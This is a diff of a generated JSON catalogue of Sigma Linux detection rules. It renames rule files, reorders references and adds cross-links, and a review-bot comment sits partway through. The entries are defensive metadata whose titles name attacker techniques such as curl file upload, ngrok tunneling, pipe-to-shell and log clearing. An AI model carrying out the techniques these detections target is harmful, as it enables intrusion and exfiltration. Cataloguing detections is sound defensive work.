[ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "377f33a1-4b36-4ee1-acee-1dbe4b43cfbe", "value": "Suspicious VSFTPD Error Messages" }, 
@@ -63561,19 +81783,28 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_clamav.yml", + "filename": "lnx_clamav_relevant_message.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/clamav/lnx_clamav.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml" ], "tags": [ "attack.resource_development", "attack.t1588.001" ] }, + "related": [ + { + "dest-uuid": "7807d3a4-a885-4639-a786-c1ed41484970", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb", "value": "Relevant ClamAV Message" }, @@ -63585,19 +81816,28 @@ "falsepositive": [ "Legitimate modification of crontab" ], - "filename": "lnx_crontab_file_modification.yml", + "filename": "lnx_cron_crontab_file_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/cron/lnx_crontab_file_modification.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml" ], "tags": [ "attack.persistence", "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", "value": "Modifying Crontab" }, 
@@ -63609,19 +81849,28 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_pwnkit_local_privilege_escalation.yml", + "filename": "lnx_auth_pwnkit_local_privilege_escalation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://twitter.com/wdormann/status/1486161836961579020", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_pwnkit_local_privilege_escalation.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml" ], "tags": [ "attack.privilege_escalation", "attack.t1548.001" ] }, + "related": [ + { + "dest-uuid": "6831414d-bb70-42b7-8030-d4e06b2660c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", "value": "PwnKit Local Privilege Escalation" }, @@ -63635,12 +81884,12 @@ "Jump servers", "Workstations with frequently changing users" ], - "filename": "lnx_susp_failed_logons_single_source.yml", + "filename": "lnx_auth_susp_failed_logons_single_source.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_susp_failed_logons_single_source.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/auth/lnx_auth_susp_failed_logons_single_source.yml" ], "tags": [ "attack.credential_access", 
@@ -63658,19 +81907,28 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_ssh_cve_2018_15473.yml", + "filename": "lnx_sshd_ssh_cve_2018_15473.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/Rhynorater/CVE-2018-15473-Exploit", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_ssh_cve_2018_15473.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml" ], "tags": [ "attack.reconnaissance", "attack.t1589" ] }, + "related": [ + { + "dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4c9d903d-4939-4094-ade0-3cb748f4d7da", "value": "SSHD Error Message CVE-2018-15473" }, 
@@ -63682,47 +81940,32 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_susp_ssh.yml", + "filename": "lnx_sshd_susp_ssh.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_susp_ssh.yml" + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml" ], "tags": [ "attack.initial_access", "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e76b413a-83d0-4b94-8e4c-85db4a5b8bdc", "value": "Suspicious OpenSSH Daemon Error" }, - { - "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/28", - "falsepositive": [ - "Vulnerability scanners", - "Frequent attacks if system faces Internet" - ], - "filename": "modsec_mulitple_blocks.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/modsecurity/modsec_mulitple_blocks.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499" - ] - }, - "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23", - "value": "Multiple Modsecurity Blocks" - }, { "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", "meta": { 
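Review bot: The `Multiple Modsecurity Blocks` cluster (uuid `a06eea10-d932-4aa6-8ba9-186df72c8d23`) is removed outright, so anything already tagged with that uuid will no longer resolve against this galaxy; if the upstream rule was moved or deprecated rather than deleted, keeping the entry (with the new filename, or a deprecation marker in `meta`) preserves the identifier. The `Disabling Security Tools - Builtin` entry is deleted in the next hunk (`@@ -63748`) and re-added with the same uuid `49f5dfc1-f92e-4d34-96fa-feba3f6acf36` further down (`@@ -63783`), so a plain filename rename shows up as a delete plus an add because entries are emitted in regenerated file order; sorting entries by `uuid` or `value` in the generator would turn that into an in-place change. The surrounding sshd cluster object starts outside this hunk.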
@@ -63736,9 +81979,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://access.redhat.com/security/cve/cve-2019-14287", "https://twitter.com/matthieugarin/status/1183970598210412546", "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml" ], "tags": [ @@ -63748,33 +81991,25 @@ "cve.2019.14287" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1365fe3b-0f50-455d-b4da-266ce31c23b0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin" }, - { - "description": "Detects disabling security tools", - "meta": { - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", - "creation_date": "2020/06/17", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "lnx_security_tools_disabling_syslog.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "linux", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_security_tools_disabling_syslog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", - "value": "Disabling Security Tools - Builtin" - }, { "description": "Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts", "meta": { 
@@ -63783,22 +82018,64 @@ "falsepositive": [ "Unknown" ], - "filename": "lnx_susp_named.yml", + "filename": "lnx_syslog_susp_named.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "linux", "refs": [ "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_susp_named.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml" ], "tags": [ "attack.initial_access", "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c8e35e96-19ce-4f16-aeb6-fd5588dc5365", "value": "Suspicious Named Error" }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/06/17", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_syslog_security_tools_disabling_syslog.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", + "value": "Disabling Security Tools - Builtin" + }, { "description": "Detects creation of cron file or files in Cron directories which could 
indicates potential persistence.", "meta": { @@ -63820,6 +82097,15 @@ "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", "value": "Persistence Via Cron Files" }, @@ -63844,6 +82130,15 @@ "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ddb26b76-4447-4807-871f-1b035b2bfa5d", "value": "Persistence Via Sudoers Files" }, @@ -63892,6 +82187,15 @@ "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a2ea919-d11d-4d1e-8535-06cda13be20f", "value": "Triple Cross eBPF Rootkit Default Persistence" }, @@ -63917,6 +82221,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", "value": "Linux Doas Conf File Creation" }, 
@@ -63948,6 +82261,43 @@ "attack.s0508" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", "value": "Communication To Ngrok Tunneling Service - Linux" }, @@ -64006,9 +82356,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://access.redhat.com/security/cve/cve-2019-14287", "https://twitter.com/matthieugarin/status/1183970598210412546", "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" ], "tags": [ 
@@ -64018,6 +82368,22 @@ "cve.2019.14287" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1365fe3b-0f50-455d-b4da-266ce31c23b0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", "value": "Sudo Privilege Escalation CVE-2019-14287" }, @@ -64090,6 +82456,15 @@ "attack.t1562.004" ] }, + "related": [ + { + "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e3a8a052-111f-4606-9aee-f28ebeb76776", "value": "Disabling Security Tools" }, @@ -64130,8 +82505,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://gtfobins.github.io/gtfobins/vim/", "https://gtfobins.github.io/gtfobins/vimdiff/", + "https://gtfobins.github.io/gtfobins/vim/", "https://gtfobins.github.io/gtfobins/rvim/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml" ], @@ -64257,6 +82632,15 @@ "attack.t1087.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c", "value": "Local System Accounts Discovery - Linux" }, @@ -64283,6 +82667,15 @@ "attack.t1552.001" ] }, + "related": [ + { + "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0cf7a157-8879-41a2-8f55-388dd23746b7", "value": "Linux Recon Indicators" }, 
@@ -64308,6 +82701,15 @@ "attack.t1222.002" ] }, + "related": [ + { + "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6419afd1-3742-47a5-a7e6-b50386cd15f8", "value": "Chmod Suspicious Directory" }, @@ -64332,6 +82734,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c4042d54-110d-45dd-a0e1-05c47822c937", "value": "Python Spawning Pretty TTY" }, @@ -64359,6 +82770,22 @@ "cve.2022.26134" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", "value": "Atlassian Confluence CVE-2022-26134" }, 
@@ -64375,11 +82802,11 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://curl.se/docs/manpage.html", "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://twitter.com/d1r4c/status/1279042657508081664", "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://curl.se/docs/manpage.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" ], "tags": [ @@ -64388,6 +82815,22 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "00b90cc1-17ec-402c-96ad-3a8117d7a582", "value": "Suspicious Curl File Upload - Linux" }, @@ -64404,8 +82847,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", + "https://gtfobins.github.io/gtfobins/apt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml" ], "tags": [ 
@@ -64429,10 +82872,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", - "https://linux.die.net/man/8/userdel", "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://linuxize.com/post/how-to-delete-group-in-linux/", + "https://linux.die.net/man/8/userdel", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml" ], "tags": [ @@ -64440,6 +82883,15 @@ "attack.t1531" ] }, + "related": [ + { + "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "08f26069-6f80-474b-8d1f-d971c6fedea0", "value": "User Has Been Deleted Via Userdel" }, @@ -64509,6 +82961,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2953194b-e33c-4859-b9e8-05948c167447", "value": "DD File Overwrite" }, @@ -64559,6 +83020,15 @@ "attack.t1053.003" ] }, + "related": [ + { + "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", "value": "Scheduled Cron Task/Job - Linux" }, @@ -64583,6 +83053,15 @@ "attack.t1049" ] }, + "related": [ + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", "value": "System Network Connections Discovery - Linux" }, 
@@ -64632,6 +83111,15 @@ "attack.t1071.001" ] }, + "related": [ + { + "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b86d356d-6093-443d-971c-9b07db583c68", "value": "Suspicious Curl Change User Agents - Linux" }, @@ -64648,8 +83136,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" ], "tags": [ @@ -64681,6 +83169,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", "value": "Scheduled Task/Job At" }, @@ -64706,6 +83203,15 @@ "attack.t1592.004" ] }, + "related": [ + { + "dest-uuid": "774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d7821ff1-4527-4e33-9f84-d0d57fa2fb66", "value": "Print History File Contents" }, @@ -64722,8 +83228,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://bpftrace.org/", + "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" ], "tags": [ 
@@ -64731,6 +83237,15 @@ "attack.t1059.004" ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", "value": "BPFtrace Unsafe Option Usage" }, @@ -64760,6 +83275,29 @@ "attack.t1203" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db", "value": "OMIGOD SCX RunAsProvider ExecuteScript" }, @@ -64784,6 +83322,15 @@ "attack.t1140" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ba592c6d-6888-43c3-b8c6-689b8fe47337", "value": "Linux Base64 Encoded Pipe to Shell" }, @@ -64808,6 +83355,15 @@ "attack.t1070.002" ] }, + "related": [ + { + "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "80915f59-9b56-4616-9de0-fd0dea6c12fe", "value": "Clear Linux Logs" }, 
@@ -64824,10 +83380,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://linuxize.com/post/how-to-delete-group-in-linux/", - "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://linux.die.net/man/8/groupdel", + "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml" ], "tags": [ @@ -64835,6 +83391,15 @@ "attack.t1531" ] }, + "related": [ + { + "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", "value": "Group Has Been Deleted Via Groupdel" }, @@ -64860,6 +83425,15 @@ "attack.t1140" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", "value": "Linux Base64 Encoded Shebang In CLI" }, @@ -64876,8 +83450,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/carlospolop/PEASS-ng", + "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/diego-treitos/linux-smart-enumeration", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" ], 
@@ -64910,6 +83484,15 @@ "attack.t1140" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "880973f3-9708-491c-a77b-2a35a1921158", "value": "Linux Shell Pipe to Shell" }, @@ -64935,6 +83518,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", "value": "Curl Usage on Linux" }, @@ -65006,6 +83598,15 @@ "attack.t1070.002" ] }, + "related": [ + { + "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", "value": "Commands to Clear or Remove the Syslog" }, @@ -65030,6 +83631,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", "value": "Suspicious Java Children Processes" }, @@ -65078,6 +83688,15 @@ "attack.t1222.002" ] }, + "related": [ + { + "dest-uuid": "09b130a2-a77e-4af0-a361-f46f9aad1345", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "34979410-e4b5-4e5d-8cfb-389fdff05c12", "value": "Remove Immutable File Attribute" }, 
@@ -65107,6 +83726,29 @@ "attack.t1203" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "21541900-27a9-4454-9c4c-3f0a4240344a", "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand" }, @@ -65123,8 +83765,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://gtfobins.github.io/gtfobins/nohup/", "https://www.computerhope.com/unix/unohup.htm", + "https://gtfobins.github.io/gtfobins/nohup/", "https://en.wikipedia.org/wiki/Nohup", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" ], @@ -65201,6 +83843,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", "value": "Connection Proxy" }, @@ -65248,6 +83899,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": 